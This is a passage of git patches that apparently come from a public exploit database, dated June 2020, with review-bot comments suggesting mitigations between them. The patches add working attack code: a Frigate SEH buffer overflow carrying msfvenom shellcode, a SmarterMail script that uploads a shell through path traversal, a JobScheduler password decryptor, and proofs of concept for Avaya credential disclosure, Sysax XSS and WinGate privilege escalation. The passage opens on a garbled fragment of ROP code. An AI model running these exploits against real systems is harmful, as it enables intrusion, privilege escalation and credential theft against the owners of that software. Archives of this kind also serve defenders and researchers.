[esp+8], edx # 
mov [esp+4], ecx # jmp near eax + 0x11060124 # retn [LIBEAY32.dll] - ROP NOP + ] + return ''.join(struct.pack('cacls WinGate.exe +C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R + + +[Affected Component] +WinGate Installation Directory + +[Impact Code execution] +true + +[Impact Denial of Service] +true + +[Impact Escalation of Privileges] +true + +[Impact Information Disclosure] +true + + +[Exploit/POC] +Logon as standard user replace WinGate.exe with a trojan executable, wait for restart or reboot the system, your code runs as SYSTEM. + + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: May 10, 2020 +Vendor acknowledgement: May 10, 2020 +Vulnerability confirmed: May 18, 2020 +Request status: May 22, 2020 +No reply +Notify vendor request CVE: May 26, 2020 +No reply +Advised of public disclosure: June 1, 2020 +No reply +June 4, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file 
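Review bot: The WinGate advisory (48573.txt) gives no mitigation, even though its timeline shows no vendor fix before disclosure. Note that the start of this file is not legible in this rendering, so this is based on the part from the `cacls` output onward. Because no fixed version exists to upgrade to, a short `[Mitigation]` section would be the most useful addition. It could say that the inherited `NT AUTHORITY\Authenticated Users:(ID)F` entry on the WinGate installation directory should be replaced with read/execute, and that file-integrity monitoring on `WinGate.exe` is a sensible interim control.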
diff --git a/files_exploits.csv b/files_exploits.csv index d49a0543a..b4b44ad01 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6737,6 +6737,10 @@ id,file,description,date,author,type,platform,port 48502,exploits/windows/dos/48502.py,"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows, 48503,exploits/windows/dos/48503.py,"Filetto 1.0 - 'FEAT' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows, 48521,exploits/multiple/dos/48521.py,"BIND - 'TSIG' Denial of Service",2020-05-20,"Teppei Fukuda",dos,multiple, +43200,exploits/windows/dos/43200.py,"Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)",2017-09-27,"Mr Bruce",dos,windows, +44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows, +38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows, +43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -11087,6 +11091,8 @@ id,file,description,date,author,type,platform,port
 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
 48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
+48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
+48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18167,6 +18173,7 @@ id,file,description,date,author,type,platform,port
 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
 48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows,
 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux,
+48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42793,3 +42800,6 @@ id,file,description,date,author,type,platform,port
 48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,
 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
+48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
+48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
+48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
From 0fc783630a9ce64d27cffe4744ea2c0c408a36f9 Mon Sep 17 00:00:00 2001
From: Offensive Security Date: Fri, 12 Jun 2020 05:01:56 +0000 Subject: [PATCH 12/17] DB: 2020-06-12 1 changes to exploits/shellcodes Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC) --- exploits/windows/local/48579.py | 67 +++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 68 insertions(+) create mode 100755 exploits/windows/local/48579.py diff --git a/exploits/windows/local/48579.py b/exploits/windows/local/48579.py new file mode 100755 index 000000000..b74eed89d --- /dev/null +++ b/exploits/windows/local/48579.py 
@@ -0,0 +1,67 @@ +# Exploit Title: Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC) +# Vendor Homepage: http://www.frigate3.com/ +# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-04 +# Vulnerable Software: Frigate Professional +# Version: 3.36.0.9 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: FrigateLCE.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for Frigate3.exe +# 4.- Open "Frigate3.exe" +# 5.- Go to "Disk" > Find Computer +# 6.- Paste ClipBoard into the "Computer Name:" field +# 7.- Click on OK +# 8.- Calc.exe runs + + +################################################################################################################################################# + +#Python "FrigateLCE.py" Code: + +f= open("FrigateLCE.txt", "w") + +junk="A" * 4112 + +nseh="\xeb\x20\x90\x90" + +seh="\x4B\x0C\x01\x40" + +#40010C4B 5B POP EBX +#40010C4C 5D POP EBP +#40010C4D C3 RETN +#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) + +nops="\x90" * 50 + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python + +buf = "" +buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" +buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" +buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" +buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" +buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" +buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" +buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" +buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" +buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" +buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" +buf 
+= "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" +buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" +buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" +buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" +buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" +buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" +buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" + + +payload = junk + nseh + seh + nops + buf + +f.write(payload) +f.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b4b44ad01..1364a99ad 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11093,6 +11093,7 @@ id,file,description,date,author,type,platform,port 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, 48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows, 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, +48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 From d2b3291be545c86f0a8eda65a411d5b44ae49e3d Mon Sep 17 00:00:00 2001 
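Review bot: The header of exploits/windows/local/48579.py lists reproduction steps but nothing a defender can act on, even though step 3 (`Turn off DEP for Frigate3.exe`) shows that the PoC as written depends on a mitigation being switched off. I would add a header line such as `# Mitigation: PoC requires DEP to be disabled for Frigate3.exe (step 3); keep DEP enabled for the process.` The `seh` value is a fixed address inside rtl60.bpl, which suggests that module is loaded without ASLR or SafeSEH, though the hunk does not show this. Separately, the final `f.close` is a bare attribute reference rather than a call and should read `f.close()`.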
From: Offensive Security Date: Sat, 13 Jun 2020 05:01:56 +0000 Subject: [PATCH 13/17] DB: 2020-06-13 3 changes to exploits/shellcodes Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) SmarterMail 16 - Arbitrary File Upload Avaya IP Office 11 - Password Disclosure Sysax MultiServer 6.90 - Reflected Cross Site Scripting --- exploits/multiple/webapps/48580.py | 134 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48581.txt | 93 +++++++++++++++++++ exploits/multiple/webapps/48582.txt | 17 ++++ files_exploits.csv | 5 +- 4 files changed, 248 insertions(+), 1 deletion(-) create mode 100755 exploits/multiple/webapps/48580.py create mode 100644 exploits/multiple/webapps/48581.txt create mode 100644 exploits/multiple/webapps/48582.txt diff --git a/exploits/multiple/webapps/48580.py b/exploits/multiple/webapps/48580.py new file mode 100755 index 000000000..4b2f40ede --- /dev/null +++ b/exploits/multiple/webapps/48580.py 
@@ -0,0 +1,134 @@ +# Exploit Title: SmarterMail 16 - Arbitrary File Upload +# Google Dork: inurl:/interface/root +# Date: 2020-06-10 +# Exploit Author: vvhack.org +# Vendor Homepage: https://www.smartertools.com +# Software Link: https://www.smartertools.com +# Version: 16.x +# Tested on: Windows +# CVE : N/A + +#!/usr/bin/python3 +import requests, json, argparse +from requests_toolbelt.multipart.encoder import MultipartEncoder + +#example usage: +#Authenticated +#python3 exp.py -w http://mail.site.com/ -f ast.aspx +#Change username & password ! + +class Tak: + + def __init__(self): + self.file_upload() + self.shell_upload() + + def loginned(self): + self.urls = results.wbsn + '/api/v1/auth/authenticate-user' + self.myobja = {"username":"mail@mail.com","password":"password","language":"en"} + self.xx = requests.post(self.urls, data = self.myobja) + self.data = json.loads(self.xx.text) + self.das = self.data['accessToken'] + self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das} + + def loginned_folder(self): + self.loginned() + self.url = results.wbsn + '/api/v1/mail/messages' + myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]} + x = requests.post(self.url, data = myobj, headers=self.headers) + print(x.text) + + def create_folder(self): + self.loginned() + self.urlz = results.wbsn + '/api/v1/filestorage/folder-put' + myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"} + myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"} + x = requests.post(self.urlz, data = myobj, headers=self.headers) + x = requests.post(self.urlz, data = myobj2, headers=self.headers) + print(x.text) + + def file_upload(self): + self.create_folder() + ''' + #resumableChunkNumber=1& + #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319& + 
#resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg& + #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", + #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate", + #print(self.xz) + #print(self.xz.headers) + ''' + size = os.path.getsize(results.wbsf) + print(size) + replace_file = results.wbsf.replace(".","") + with open(results.wbsf, "rb") as outf: + contents = outf.read() + multipart_data = MultipartEncoder( + fields={ + "context": "file-storage", + #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}', + "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}', + "resumableChunkNumber": "1", + "resumableChunkSize": "2097152", + "resumableCurrentChunkSize": str(size), + "resumableTotalSize": str(size), + "resumableType": "image/jpeg", + #"resumableIdentifier": "955319-112097jpg", + "resumableIdentifier": str(size) + "-" + str(replace_file), + "resumableFilename": results.wbsf, + "resumableRelativePath": results.wbsf, + "resumableTotalChunks": "1", + "file": ( + 'blob',#112097.jpg', + #open(file, "rb"), + contents, + #file, + #"image/jpeg" + "application/octet-stream" + #'text/plain' + ) + + } +) + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.) 
>> proxies=proxyDict + self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, + 'Authorization': "Bearer " + self.das, + 'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data) + + def shell_upload(self): + + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + + json_data = { + "folder": "Root Folder\\testos1\\", + "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\", + "parentFolder": "", + "newParentFolder": "Root Folder\\testos2" + } + #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict) + r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers) + print(results.wbsn + "/testos1/" + results.wbsf) + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + parser.add_argument('-f', action='store', dest='wbsf', + help='Filename') + parser.add_argument('-w', action='store', dest='wbsn', + help='Target') + parser.add_argument('--version', action='version', version='SmartMail Knock Knock') + results = parser.parse_args() + + tako = Tak() + tako \ No newline at end of file diff --git a/exploits/multiple/webapps/48581.txt b/exploits/multiple/webapps/48581.txt new file mode 100644 index 000000000..c5ba5835c --- /dev/null +++ b/exploits/multiple/webapps/48581.txt 
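Review bot: The header of exploits/multiple/webapps/48580.py says only `Version: 16.x` and `CVE : N/A`, so a reader cannot tell which builds are fixed or what to look for in server logs. The request in `shell_upload` is distinctive: a POST to `/api/v1/filestorage/folder-patch` whose `newFolderName` is a run of `\..\` segments ending under the SmarterMail `MRS` directory. I would record that in a header comment such as `# Detection: folder-patch requests whose newFolderName contains "..\" path segments`. The script also needs valid mailbox credentials (`loginned` posts a username and password to `authenticate-user`), which is worth stating as a precondition next to the existing `#Authenticated` comment.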
@@ -0,0 +1,93 @@ +# Exploit Title: Avaya IP Office 11 - Password Disclosure +# Exploit Author: hyp3rlinx +# Date: 2020-06-09 +# Vender Homepage: https://downloads.avaya.com +# Product Link: https://downloads.avaya.com/css/P8/documents/101067493 +# CVE: CVE-2020-7030 + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.avaya.com + + +[Product] +Avaya IP Office v9.1.8.0 - 11 + +IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively. + + +[Vulnerability Type] +Insecure Transit Password Disclosure + + +[CVE Reference] +CVE-2020-7030 +ASA-2020-077 + + +[Security Issue] +A sensitive information disclosure vulnerability exists in the web interface component of IP Office that +may potentially allow a local user to gain unauthorized access to the component. + +The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework +within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string. + +https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US + +wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0& +X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true + +Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y +Value: Administrator:Administrator + +The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker. +The URL plus the credentials can potentially be leaked or stored in some of the following locations. 
+ +Browser History +Browser Cache +Browser Developer Tools +Cached by web proxy +Referer Header +Web Logs +Shared Systems + + +[Avaya Products affected] +Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2 + + +[References] +https://downloads.avaya.com/css/P8/documents/101067493 + + +[Network Access] +Remote + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: February 19, 2020 +Vendor confirms issue: March 4, 2020 +Vendor release advisory fix : June 3, 2020 +June 4, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/multiple/webapps/48582.txt b/exploits/multiple/webapps/48582.txt new file mode 100644 index 000000000..d52249d0a --- /dev/null +++ b/exploits/multiple/webapps/48582.txt 
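Review bot: In exploits/multiple/webapps/48581.txt the `[Security Issue]` paragraph says the flaw may allow `a local user` to gain access, while the `[Network Access]` field further down says `Remote`; the two should agree, or the advisory should say which precondition applies. The exposure paths it lists (browser history, cache, web proxy, Referer header, web logs) read as access to a machine or intermediary that saw the URL rather than direct network reach. The affected list ends at 11.0.4.2 without naming where the fix is documented; a line such as `Remediation: see ASA-2020-077` under `[References]` would point readers to it.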
@@ -0,0 +1,17 @@ + # Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting +# Google Dork: n.d. +# Date: 2020-06-02 +# Exploit Author: Luca Epifanio (wrongsid3) +# Vendor Homepage: https://www.sysax.com/ +# Software Link: https://www.sysax.com/download.htm +# Version: MultiServer 6.90 +# Tested on: Windows 10 x64 +# CVE : CVE-2020-13228 + +There is reflected XSS via the /scgi sid parameter. + +PoC: +http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd +&pid=transferpage2_name1_fff.htm + +PoC Screen: https://pasteboard.co/J9eE2GQ.png \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1364a99ad..9156dcf38 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -42802,5 +42802,8 @@ id,file,description,date,author,type,platform,port 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php, -48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, +48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php, +48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple, +48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple, +48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple, From bb9f12afc7930e17af47218aa0123120f70367a3 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 16 Jun 2020 05:01:56 +0000 Subject: [PATCH 14/17] DB: 2020-06-16 3 changes to exploits/shellcodes SOS JobScheduler 1.13.3 - Stored Password Decryption Linux/ARM - execve /bin/dash Shellcode (32 bytes) Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes) --- exploits/multiple/remote/48587.py | 37 ++++++++++++++ files_exploits.csv | 1 + files_shellcodes.csv | 2 + shellcodes/arm/48585.c | 81 ++++++++++++++++++++++++++++++ shellcodes/arm/48586.c | 83 +++++++++++++++++++++++++++++++ 5 files changed, 204 insertions(+) create mode 100755 exploits/multiple/remote/48587.py create mode 100644 shellcodes/arm/48585.c create mode 100644 shellcodes/arm/48586.c diff --git a/exploits/multiple/remote/48587.py b/exploits/multiple/remote/48587.py new file mode 100755 index 000000000..993bfbdc3 --- /dev/null +++ b/exploits/multiple/remote/48587.py 
@@ -0,0 +1,37 @@ +# Exploit Title: SOS JobScheduler 1.13.3 - Stored Password Decryption +# Google Dork: N/A +# Date: 2020-04-20 +# Exploit Author: Sander Ubink +# Vendor Homepage: www.sos-berlin.com +# Software Link: www.sos-berlin.com/en/jobscheduler-downloads +# Version: Tested on 1.12.9 and 1.13.3, vendor reported 1.12 and 1.13 +# Tested on: Windows and Linux +# CVE: CVE-2020-12712 + +# Description: SOS JobScheduler is a tool for remote system administration that allows users to call maintenance scripts via a web interface. +# The tool places the maintenance scripts on the remote systems by means of (S)FTP. It allows the user to save profiles for these connections, +# in which the password for the (S)FTP connection is optionally stored. When the user chooses to store the password with the profile, +# it is encrypted using the name of the profile as the encryption key. Since the name of the profile is stored in the same configuration file, +# the plaintext (S)FTP password can trivially be recovered. The encryption algorithm used is Triple DES (3DES) with three keys, requiring a key +# length of 24 bytes. The profile name is padded to this length to create the key. Finally, the encrypted password gets base64 encoded before +# being stored in the configuration file. + +# Usage: python jobscheduler-decrypt.py [encrypted password in base64] [profile name] + +import pyDes +import base64 +import argparse + +parser = argparse.ArgumentParser(description="Decrypt the password stored in a Jobscheduler (S)FTP profile configuration file") +parser.add_argument("password", help="password to be decrypted") +parser.add_argument("profilename", help="name of the profile") +args = parser.parse_args() + +if len(args.profilename) > 24: + sys.exit("Profile name is longer than 24 characters. 
Check the validity of the input.") + +key = args.profilename + ((24 - len(args.profilename)) * " ") +cipher = pyDes.triple_des(key, pyDes.ECB, b"\0\0\0\0\0\0\0\0", pad=" ", padmode=None) +plain = cipher.decrypt(base64.b64decode(args.password)) + +print(plain) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9156dcf38..486af450a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18175,6 +18175,7 @@ id,file,description,date,author,type,platform,port 48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows, 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux, 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple, +48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index fbc6a8d1c..4df2da0ca 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
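Review bot: The length guard in exploits/multiple/remote/48587.py calls `sys.exit(...)`, but the script imports only `pyDes`, `base64` and `argparse`, so a profile name longer than 24 characters raises `NameError` instead of printing the message; add `import sys` or use `parser.error(...)`. The description explains that the key is the profile name kept in the same configuration file, yet it offers no remediation. A header comment such as `# Mitigation: avoid saving (S)FTP passwords in profiles on the affected 1.12/1.13 releases and restrict read access to the profile configuration file` would give defenders something to act on; the fixed release is not stated on this page and should be taken from the vendor's notice for CVE-2020-12712.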
